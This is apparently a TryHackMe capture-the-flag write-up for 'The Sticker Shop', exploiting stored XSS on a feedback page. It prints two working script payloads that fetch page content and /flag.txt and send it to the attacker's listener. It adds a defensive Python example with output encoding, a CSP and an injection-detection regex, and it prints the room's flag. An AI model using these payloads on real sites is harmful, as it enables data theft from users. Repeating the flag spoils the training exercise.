TRYHACKME - The Sticker Shop
Easy room created by toxicat0r. This room focuses on the XSS vulnerability. If you want to try it, you can access the room here.
Scanning
Start your machine to obtain the Machine IP address and fire up Nmap like always to scan for the open ports and services of the IP address, using the command nmap -sC -sV [IP Address], and wait a couple of minutes until the scan finishes.
From our scan result we got 2 open ports: 22 for SSH and 8080 for HTTP. So there is a web service assigned to the IP address. Let's visit the site using the URL http://IP MACHINE:8080.
Attack & Get The Flag
There are 2 pages on the website: Home and Feedback. Nothing was interesting on the Home page. Let's see the Feedback page.
This is the juicy part. As we all know, Feedback and Comment pages are quite famous for XSS vulnerabilities. So let's test whether our XSS is reflected by the machine or not.
Setup And Payload.
To test whether the machine reflects our XSS or not, I first set up a local server using the command python -m http.server 80, so that when the XSS fires I will be able to see the response on our local server.
For the test payload (shout out to ChatGPT for the assist), I use a GET request to fetch the source code of the Home page. Here is the payload:
<script>
  fetch('/')
    .then(response => response.text())
    .then(data => {
      const encoded = btoa(data); // Base64 encode the response text
      new Image().src = 'http://10.17.0.175/' + encoded;
    })
    .catch(err => console.error(err));
</script>
Basically, what the payload does is:
fetch('/'): requests the source code of the current page (the index page).
btoa(data): converts the page source to a Base64-encoded string.
new Image().src: sends the encoded source to your server as the path of a GET request for an image, which shows up in the http.server log.
The machine's response was sent to our local Python server and we got a Base64-encoded string in the request, which, when decoded, gives us the source code of the index page, just as our payload should. This shows that our payload is working and that the machine is vulnerable to XSS.
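The reason the payload runs at all is that the feedback page inserts whatever was submitted straight into its HTML. The following is an added example, not code from the room or from toxicat0r, showing the vulnerable rendering pattern beside the hardened one (HTML-encoding each entry) plus a submission-time triage check and defence-in-depth headers. The sample feedback entries, the callback host placeholder and the header values are constructed for the example and are not taken from the room.

```python
import html
import re

# Constructed sample feedback submissions: one benign entry and one modelled on
# the page's test payload. ATTACKER_HOST_PLACEHOLDER stands in for a callback host.
SAMPLE_FEEDBACK = [
    "Love the stickers, shipping was fast!",
    "<script>fetch('/').then(r => r.text()).then(d => {"
    "new Image().src = 'http://ATTACKER_HOST_PLACEHOLDER/' + btoa(d);})</script>",
]

PAGE_TEMPLATE = "<html><body><h1>Feedback</h1><ul>{items}</ul></body></html>"


def render_feedback_unsafe(entries):
    """Vulnerable pattern: user input is concatenated straight into the HTML.
    A <script> tag in a stored entry runs in the browser of whoever views it."""
    items = "".join(f"<li>{entry}</li>" for entry in entries)
    return PAGE_TEMPLATE.format(items=items)


def render_feedback_safe(entries):
    """Hardened pattern: HTML-encode every entry before insertion, so
    '<script>' becomes '&lt;script&gt;' and is displayed as text, not executed."""
    items = "".join(f"<li>{html.escape(entry, quote=True)}</li>" for entry in entries)
    return PAGE_TEMPLATE.format(items=items)


def security_headers():
    """Defence-in-depth response headers (assumed values, not from the room).
    This CSP blocks inline scripts and restricts where images may be loaded
    from, which is exactly what the page's image-based exfiltration relies on."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; img-src 'self'; connect-src 'self'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


# Obvious script-injection markers: a script tag, a javascript: URL, or an
# inline event handler attribute such as onerror=.
SCRIPT_PATTERN = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)


def flag_suspicious_feedback(entries):
    """Submission-time triage: return the indexes of entries that contain
    script-injection markers, for review or alerting. This is not a substitute
    for output encoding; encoding on render is the actual fix."""
    return [i for i, entry in enumerate(entries) if SCRIPT_PATTERN.search(entry)]


def contains_live_script(rendered_html):
    """True if the rendered page still contains an executable <script> tag."""
    return "<script>" in rendered_html.lower()


if __name__ == "__main__":
    unsafe = render_feedback_unsafe(SAMPLE_FEEDBACK)
    safe = render_feedback_safe(SAMPLE_FEEDBACK)
    print("unsafe render executes script:", contains_live_script(unsafe))
    print("safe render executes script:  ", contains_live_script(safe))
    print("flagged entries:", flag_suspicious_feedback(SAMPLE_FEEDBACK))
    print("headers:", security_headers())
```

Running the block shows the unsafe render keeping the script tag intact while the safe render turns it into harmless text; the triage check flags only the second entry. The CSP is a second layer: even if an encoding bug slipped through, an inline script and an image request to a foreign host would both be refused by a browser that enforces it.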
Get The Flag.
In the room description, the author mentioned that the flag is located at /flag.txt. So we use the same method as our test payload to send the machine's response to our local Python server, but since we already know the location of the flag we only need to make a few small changes to the test payload and the new payload is ready to go. Here is the new payload:
<script>
  fetch('/flag.txt')
    .then(response => response.text())
    .then(data => {
      new Image().src = 'http://10.17.0.175/?flag=' + encodeURIComponent(data);
    });
</script>
Return to our local Python server and, as you can see, the machine sent the contents of /flag.txt to our local server and we managed to get the flag.
Flag
THM{B83789a69074f636f64a38879cfcabe8b62305ee6}